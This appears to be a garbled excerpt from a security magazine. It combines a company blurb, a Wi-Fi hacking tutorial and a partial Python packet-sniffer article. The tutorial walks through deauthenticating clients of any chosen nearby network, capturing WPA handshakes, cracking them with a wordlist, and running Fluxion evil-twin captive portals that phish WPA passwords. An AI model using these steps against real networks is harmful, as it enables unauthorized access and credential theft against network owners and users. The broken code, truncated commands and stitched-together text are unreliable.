Everything about Ethical Hacking and Vulnerability Testing that I teach also fuels my urge
to earn more knowledge in these fields and also helps share the same among others.
I believe that in the ever-growing hostile environment of Cyber space that we all include
much of our daily activities, this article will help bring simple understandings about ethi-
Indian Cyber Security Solutions is a rising platform with a mission to provide all possible cyber security
solutions from large corporate companies to new emerging ones regardless of their sizes & kinds. Cyber
criminals are warming up with latest innovative techniques & modus operandi to break through networks
and open the floodgates for unauthorized access so as to get some valuable data and information about
companies to exploit and take advantage of. Protecting corporate agencies, companies & organizations
from these threats are the fundamental work that we are focused upon. In a nutshell, our main mission is
to ensure that your data remains absolutely protected, safe and devoid of any unauthorized access from
So, as cyber security solution provider our aim is to utilize our vast long experience and knowledge in
the field by executing the exposure that we have gained over all these years. As a part of our mission,
the onus is on us to assure uninterrupted flawless services & maintenance to your company with which
you can facilitate your business confidently without having to bother about the hovering, critical and the
ever so delicate aspect of security. And when your customers are satisfied and your business runs swiftly
we consider it as our own achievement taking pride in the fact that our mission is accomplished.
Wireless Hacking Tools
We know that everyone is curious about Wireless/Wi-Fi hacking. Even I was curious about Wi-Fi hacking when I was
a teenager. But before hacking something, we need to be familiar with the working mechanism of Wi-Fi technology. So
before starting, Here’s a little a bit of information about Wi-Fi technology, mainly its security. And one more thing,
this is totally for educational purposes only. Let’s start…
The most common types of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA).
And the new one is Wi-Fi Protected Access II (WPA2).
1. Wired Equivalent Privacy (WEP): is the most widely used Wi-Fi security algorithm in the world. In 1999,
the first versions of WEP weren’t particularly strong, even for the time they were released, because U.S. re-
strictions on the export of various cryptographic technology led to manufacturers restricting their devices to
only 64-bit encryption. Later when the restriction was removed, 128-bit encryption was implemented and
remains the most common, though 256-bit has been released.
2. Wi-Fi Protected Access (WPA): It was formally adopted in 2003, a year before WEP was officially retired.
The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit.
Some of the significant changes implemented with WPA included message integrity checks (to determine if
an attacker had captured or altered packets passed between the access point and client) and the Temporal
Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than
fixed key used in the WEP system. TKIP was later superseded by Advanced Encryption Standard (AES).
3. Wi-Fi Protected Access II (WPA2): WPA has, as of 2006, been officially superseded by WPA2. One of the
most significant changes between WPA and WPA2 was the mandatory use of AES algorithms and the intro-
duction of CCMP (Counter Cipher Mode with Block Chaining Message Authentication Code Protocol) as a
replacement for TKIP (still preserved in WPA2 as a fall-back system and for interoperability with WPA).
Currently, the primary security vulnerability to the actual WPA2 system is an obscure one (and requires the
attacker to already have access to the secured Wi-Fi network in order to gain access to certain keys and then
perpetuate an attack against other devices on the network). As such, the security implications of the known
WPA2 vulnerabilities are limited almost entirely to enterprise level networks and deserve little to no practi-
cal consideration in regard to home network security. Unfortunately, the same vulnerability that is the big-
gest hole in the WPA armour, the attack vector through the Wi-Fi Protected Setup (WPS), remains in mod-
ern WPA2-capable access points. Although breaking into a WPA/WPA2 secured network using this vulner-
ability requires anywhere from 2-14 hours of sustained effort with a modern computer, it is still a legitimate
security concern and WPS should be disabled (and, if possible, the firmware of the access point should be
flashed to a distribution that doesn’t even support WPS so the attack vector is entirely removed).
Before cracking Wi-Fi, here is a basic list ranking the current Wi-Fi security methods available on any modern (post-
2006) router, ordered from best to worst:
Wireless Hacking Tools
Now it’s time to crack a Wi-Fi using different tools that use different techniques.
This is the most popular tool that is used for Wi-Fi cracking. To execute an attack using this tool, you need a laptop
loaded with a penetration testing OS, like Kali, BackBox, etc. Here I’m using BackBox and TP-LINK TL-WN722N.
This tool comes preinstalled in any pentesting OS. If you want to download this tool, you’ll get it here - Or visit the official website Now just follow
the steps carefully.
Open terminal and type “iwconfig” to detect if there is any wireless interface and its name. Here the interface name
is “wlan0” as shown in the picture below.
Now we have to enable monitor mode on that particular interface. So, let’s run this command as shown below
“airmon-ng start wlan0” ”
Wireless Hacking Tools
Oops. After executing the command, we get a message that “Found 5 process that could cause trouble. If airodump-
ng, aireplay-ng airtun-ng stops working after a short period of time, you may want to kill (some of) them!”
and showing some process names with their PID (Process ID). And one more thing, it is also showing that (monitor
mode enabled on mon0). Now we are going to kill those processes because we don’t want any interruption during the
whole process. So now, execute this command “airmon-ng check kill”. This will check which process may inter-
rupt and kill them.
Now we are going to capture nearby traffic, for this we have to run this command “airodump-ng mon0”. As soon as
you run the command you’ll get this window.
Wireless Hacking Tools
Here you can see lots of Wi-Fi networks with MAC Address of the Access Point (BSSID), how much data is transferring
(#Data), Channel (CH), Encryption (ENC), what kind of Cipher is used for authentication (CIPHER), and Names of
the Wi-Fi (AP) Access Point (ESSID). As soon as you get the target name here, press “Ctrl+C”. This will stop scanning.
Now select any as your target, as I targeted the highlighted one. We need only two things from here, BSSID and CH. Its
BSSID is C4:E9:84:7A:E1:16, CH is 4. Now copy the BSSID. Now type “airodump-ng --bssid
C4:E9:84:7A:E1:16 -c 4 --write WPAcrack mon0” in the terminal.
WPAcrack is the file name in which you want to write captured data.
mon0 is the monitoring wireless adapter.
Wireless Hacking Tools
Now open a new terminal and run this command there “aireplay-ng --deauth 20 -a C4:E9:84:7A:E1:16
--deauth stands for De-authentication.
This step is the main one every time you’ll try to crack any Wi-Fi. The logic is that we are going to hit/kick away the ac-
cess point instead of any system connected to the AP (old technique, but also works well) from all the systems con-
nected to the AP using a specially crafted packet. Then all the systems automatically try to connect to the AP and send
an authentication packet. We have to capture the particular authentication packet because it contains the password of
the AP.
Check out the image below.
Now return to the previous terminal and wait until we can see WPA handshake: BSSID (Highlighted)
Wireless Hacking Tools
You can stop this by pressing Ctrl+C after getting the handshake.
Now, here comes the final step. We captured a packet that is encrypted with the hash value of the key. Here we’ll use a
wordlist to find out the key named as “rockyou.txt” (you can use your own custom dictionary or wordlist) that may con-
tain the password. Here “aircrack-ng” converts the words of the wordlist to the hash value and matches the value
with the captured packet.
-w is for wordlist.
There are lot more tools like “Aircrack-ng”. The tools are listed below: ~
This is an automated wireless attack tool. It runs only on Linux. Easy to download and run, just use the following com-
root@kali:~# wget
Wireless Hacking Tools
➔Wi-Fi Phisher:
➔How it works: - From the victim's perspective, the attack makes use of three phases:
Wireless Hacking Tools
1. Victim is being DE-authenticated from his/her access point. Wifiphisher continuously jams all of the target access
point's Wi-Fi devices within range by forging “DE- authenticate” or “Disassociate” packets to disrupt existing asso-
2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then
creates a rogue wireless access point that is modelled by the target. It also sets up a NAT/DHCP server and for-
wards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue
access point. After this phase, the victim is MiTMed.
3. Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server
that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, Wifiphisher will
respond with a realistic fake page that asks for credentials or serves malware. This page will be specifically crafted
for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports
community-built templates for different phishing scenarios.
➔Ghost Phisher:
Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python pro-
gramming language and the Python Qt GUI library. The program is able to emulate access points and deploy. This tool
is already installed in Kali Linux. Just open a terminal and type:
root@kali:~# ghost-phisher
Wireless Hacking Tools
➔ Fluxion (Linset):
Fluxion is based on a script named Linset. There is not much difference between them. The main thing is that most of
the bugs of Linset were fixed in Fluxion. This is the most advanced and powerful tool for Wi-Fi hacking till now.
➔ How it works:
2. Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password).
5. DE-authenticates all users connected to the target network, so they can be lured to connect to the FakeAP
and enter the WPA password.
6. A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running
the script.
7. A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password.
Wireless Hacking Tools
Fire up your Kali Linux and open a terminal. Follow the steps below,
root@kali:~# git clone
root@kali:~# cd fluxion/
root@kali:~/fluxion# ./fluxion
Select your preferred language here:
Now you’ll get this window to select the interface you like to use.
Wireless Hacking Tools
This tool is so advanced that you don’t need to type anything, just select your desired option and go on.
So, after selecting the interface it’ll ask for which channel is to be scanned. Go for “All”
As you select “1” it’ll scan for all the available “Access Points” (APs) with their details.
Wireless Hacking Tools
Hit “Ctrl+c” when you get your target name in the list or you can also go with any of them. As you press “Ctrl+c”
you’ll get a window.
Select your target number here, mine is 25. Now you get this window and select “1” to create a fake access point with
the same “name” and “MAC id” of the target.
Wireless Hacking Tools
Now, the next window comes up, just press “Enter” to skip. Actually, it is asking for the path where the handshake will
be kept. Let it be default.
Wireless Hacking Tools
to connect back with the authentication packet and we are ready to capture them.
When you see WPA handshake is captured, click on those mini terminal (xterm) and press “Ctrl+c” and then press “1”
to check the handshake.
The next windows comes like this and asks you for the attack method. Here choose “1 (Web Interface)” for “Wi-Fi
phishing attack.”
Here again just choose the option:
Wireless Hacking Tools
After that you’ll see your Kali Linux like the below picture. All the devices will be disconnected from the original AP.
Obviously, they will try to go to the Wi-Fi settings and search for the Wi-Fi name they used to connect. When someone
tries to connect to our “Fake AP”, you’ll see this:
Wireless Hacking Tools
Wireless Hacking Tools
After entering the right password, Victim will see this message:
Wireless Hacking Tools
Study at the University of Guanajuato Mexico (Faculty of Mechanical and Electrical Engineering Elec-
tronica) Electronical Engineering and Telecommunications. I'm from Irapuato, Guanajuato Mexico. Co-
Programming In Python Forensic Analysis For Network
Much has been said about Python being a programming language that is too easy and very efficient for programming,
in our case, for hackers. We will not go into detail in the syntax, nor in the programming structure with Python, but it
is necessary to see a little of the great range of the forensic analysis. Within the forensic analysis, there are several ap-
plication points: mobile, networking, cloud, or local equipment. In our case, we will use forensic analysis at the net-
working level programming with Python, so let's start. We will be making a small sniffer and we will do it little by little,
strengthening it as we go.
To make comparisons for the forensic analysis, we can use the list of URLs found at the following address:
struct.pack(fmt, v1, v2, ...) Return a bytes object containing the values v1, v2, ... packed according to the format
string fmt. The arguments must match the values required by the format exactly.
buffer (presumably packed by pack(fmt, ...)) according to the format string fmt. The result is a tuple even if it con-
tains exactly one item. The buffer’s size in bytes must match the size required by the format, as reflected by calcsize().
socket.recvfrom(bufsize[, flags]) Receive data from the socket. The return value is a pair (string, address) where
string is a string representing the data received and address is the address of the socket sending the data. See the Unix
manual page recv(2) for the meaning of the optional argument flags; it defaults to zero.
Programming In Python Forensic Analysis For Network
Let's start with the programming, and gradually I will explain what is done.
Step 1.
We created a list of IP addresses that we will use as our base for the forensic filtering and analysis of our network traf-
fic. I suggested the blacklist that DansGuardian uses, as this article is explanatory, only.
How many IP addresses along with the addresses of Google, Facebook and Youtube, this content can be seen in file:
This list will serve us to compare it with our data that we are capturing with
our sniffer that we create with Python.
Programming In Python Forensic Analysis For Network
C) Area of work:
Its structure that has the IDE makes us save time and efforts for the programming in Python, it makes life easier and it
raises us. Of the IDE I have used to program in Python, I think it is IDE free which is very robust and fails to use. But
what interests us is how to create this sniffer for forensic analysis at the network level. This is the first part to be able
to create a robust tool to do a proper analysis and complete with our own tools.
Code 1:
#!/usr/bin/env python
import socket
import os
Programming In Python Forensic Analysis For Network
# We put our card promiscuously so that you can read all the packages that pass through
our network
#We created another file that will serve to collect our comparisons
if reto == int("0"):
except socket.error:
bucle = 1
pac = soc.recvfrom(65565)
bucle = bucle + 1
llenado2.write(str(pac) +'\n')
Programming In Python Forensic Analysis For Network
pac = pac[0]
#The zero indicates from which position is going to start counting towards
#the right side, in this case, we will start counting from the space 0
ip_h = pac[0:20]
#We unpacked
versionh = ip1[0]
ip1_length = interneth * 4
ttl1 = ip1[5]
protocol = ip1[6]
source_a = socket.inet_ntoa(ip1[8]);
destination_a = socket.inet_ntoa(ip1[9]);
Programming In Python Forensic Analysis For Network
tcp_header = pac[ip1_length:ip1_length+20]
#We unpacked
source_port = tcph[0]
dest_port = tcph[1]
sequence = tcph[2]
acknowledgement = tcph[3]
doff_reserved = tcph[4]
print ('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) +
' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) +
' TCP header length : ' + str(tcph_length))
data = pac[h_size:]
za=open("fileip.txt", "r")
Programming In Python Forensic Analysis For Network
print (za)
#We add to our file that we created to use it later the traffic that we cap-
tured when comparing it with the list that we use of blacklist, and those that we added
to file 1
Code explanation:
Our network card makes a direct connection, but when we put it in promiscuous mode, what it does is that it starts to
hear everything that happens around it, and begins to see all the traffic of the network when it has the necessary per-
missions to be able to do it. In our case, we want to see everything that happens in our network and see if IP addresses
are reliable or not.
Programming In Python Forensic Analysis For Network
In the file captures.txt we download the connections that we have captured and in our list of IP addresses as we place
them as prohibited, it serves us to have a history of connections.
In the file captures0.txt we have the general capture of the traffic of the network.
We activate our socket so that you can see all the connections that are made.
We give a loop of 4000, this can vary according to what we say, we could even do it timed for the capture, in our case,
we want you to perform the same operation 4000 times to see more packages that connect to our network.
pac = soc.recvfrom(65565)
When we begin our capture, we are receiving the data in the following format:
Programming In Python Forensic Analysis For Network
('', 0))
Programming In Python Forensic Analysis For Network
c1\x19\xf8\xfc\xc9\xb9', ('', 0))
We can observe that it begins with: ('E and ends with the IP direction and the closing of the parenthesis
ip_h = pac[0:20]
Place 0 indicates that there is nothing before it will start counting for data extraction, 20 indicates that there are 20
places to the right of the first reference, i.e. place 20.
Unpacking explanation.
Table 1:
! big endian
x no value
c string of length 1 1
b integer 1 (3)
B integer 1 (3)
? bool 1 (1)
h integer 2 (3)
H integer 2 (3)
i integer 4 (3)
I integer 4 (3)
l integer 4 (3)
L integer 4 (3)
q integer 8 (2), (3)
Q integer 8 (2), (3)
f float 4 (4)
d float 8 (4)
s string
p string
P integer (5), (3)
Programming In Python Forensic Analysis For Network
In this case, we say to ip1 the IP address, it is necessary to add to the unpacked the variable ip_h which is where we
have our IP address.
Scheme 1:
Programming In Python Forensic Analysis For Network
With the data that we have obtained, based on the previous unpacking, we can get the
IPv version. The IP source, the IP destination, and the protocols:
versionh = ip1[0]
ip1_length = interneth * 4
ttl1 = ip1[5]
protocol = ip1[6]
source_a = socket.inet_ntoa(ip1[8]);
destination_a = socket.inet_ntoa(ip1[9]);
To get the real values, they are the ones we have in square brackets.
Now we need to extract the data regarding TCP, for this we use the following:
source_port = tcph[0]
dest_port = tcph[1]
sequence = tcph[2]
acknowledgement = tcph[3]
doff_reserved = tcph[4]
print ('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) +
' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) +
' TCP header length : ' + str(tcph_length))
Programming In Python Forensic Analysis For Network
sourcePort = tcpHeaderBuffer[0]
destinationPort = tcpHeaderBuffer[1]
sequenceNumber = tcpHeaderBuffer[2]
acknowledgement = tcpHeaderBuffer[3]
dataOffsetandReserve = tcpHeaderBuffer[4]
flags = tcpHeaderBuffer[5]
windowSize = tcpHeaderBuffer[6]
tcpChecksum = tcpHeaderBuffer[7]
urgentPointer = tcpHeaderBuffer[8]
As we can see, we can extract any data that we wanted to be able to have a more complete analysis, we can also com-
bine with more tools and scripts to be able to make it more robust. In later deliveries, we will be making it more robust
The last part consists of analyzing the IP addresses with the addresses already listed, the existing IP address is stored
in our file called: captures.txt for line in content:
Programming In Python Forensic Analysis For Network
List 2:
Source Port: 443 Dest Port: 43970 Sequence Number: 432344699 Acknowledgement :505925010
TCP header length: 8
Source Port: 443 Dest Port: 43970 Sequence Number: 432344699 Acknowledgement :505925010
TCP header length:
Source Port: 443 Dest Port: 43970 Sequence Number: 432344741 Acknowledgement :505925517
TCP header length: 8
Programming In Python Forensic Analysis For Network
Source Port: 443 Dest Port: 43970 Sequence Number: 432344741 Acknowledgement :505925517
TCP header length: 8
Source Port: 443 Dest Port: 49648 Sequence Number: 589385278 Acknowledgement
:2789641438 TCP header length: 8
There are many ways to apply Python and its great benefits, its simplicity but also its power, it helps us in different ar-
eas of work or administrative life, in our case, we can use it for forensic analysis. Soon I will be publishing even more
about Python and the forensic analysis at the networking level.
• Python Forensics A Workbench for Inventing and Sharing Digital Forensic Technology Chet Hosmer
Technical Editor: Gary C. Kessler Page 246